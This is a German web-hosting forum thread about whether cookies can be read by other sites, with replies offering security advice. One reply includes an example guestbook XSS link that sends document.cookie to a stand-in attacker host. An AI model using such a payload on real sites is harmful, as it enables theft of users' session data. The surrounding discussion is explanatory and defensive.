kostenloser Webspace werbefrei: lima-city


Wie sicher sind Cookies?

lima-cityForumDie eigene HomepageSicherheit im Internet

  1. Autor dieses Themas

    xenodez

    xenodez hat kostenlosen Webspace.

    Wie ist das, kann eine fremde Seite die Cookies auslesen, die ich von meiner Seite an den Nutzer geschickt habe?
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. sebastian-online

    sebastian-online hat kostenlosen Webspace.

    Hallo,
    xenodez schrieb:
    Wie ist das, kann eine fremde Seite die Cookies auslesen, die ich von meiner Seite an den Nutzer geschickt habe?

    nein - normalerweise nicht!

    Sebastian

    PS: Passwörter würde ich aber trotzdem in Cookies verschlüsseln.

  4. Autor dieses Themas

    xenodez

    xenodez hat kostenlosen Webspace.

    Verschlüsseln tu ich die sowieso. Aber es ist ja nunmal nicht völlig unmöglich, Cookies zu manipulieren. Wenn also jemand nen fremdes Cookie auslesen könnte, dann wäre das dennoch eine Gefahr.
  5. Ein alter Trick, der aber in keinem Browser mehr funktionieren dürfte, war folgender:

    //z.B. ein Eintrag in ein Gästebuch
    //die Homepage des Benutzers:
    <a href="javascript:window.location.href='boese_seite.de/?c='+document.cookie">besucht meine Homepage!</a>


    So wird der Inhalt des Cookies dann per GET an einen fremden Server geschickt.
    (Also Cross-Site-Scripting)

    Grundsätzlich kann man Cookies schon als sicher ansehen. Es kommt aber auch darauf an, ob du noch fremde JavaScripte (z.B. Layer Ads) in deiner Seite eingebunden hast und dann könnte z.B. Layer Ads auf die Cookie Daten zugreifen.
    (Ich hab es jetzt nicht getestet, aber theoretisch müsste es funktionieren)

    Ansonsten ist natürlich noch zu beachten, dass Cookies ganz normale Dateien sind, die ein unbefugter Nutzer eines PCs einfach kopieren und auf dem eigenen Rechner dann als seine eigenen verwenden kann.

    Beitrag geändert: 17.7.2007 21:41:57 von bladehunter
  6. Autor dieses Themas

    xenodez

    xenodez hat kostenlosen Webspace.

    Naja, die Nutzung von Scripten und HTML an sich versuche ich in solchen Bereichen, in denen die Nutzer was eintragen können, zu deaktivieren.

    Und gegen das direkte Kopieren der Cookies kann ich ja wohl nicht viel machen.. Das ist dann die Sache des jeweiligen Nutzers.
  7. Also ich würde prinzipiell keine Sensiblen Daten in einen Cookie schreiben
    (Passwort,Username etc. )
    Das mittel der Wal ist hier eine Session mit IP Bindung.
    Zudem sind Cookies dann doch recht schnell durch irgend welche exploits im Browser abgefragt.
    Spätestens über Cross site Scripting oder URL Cloaking lassen sich nach wie vor einige Browser aushebeln. Allerdings ist dass für den Amateurbereich nichtmehr wirklich relevant.
  8. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!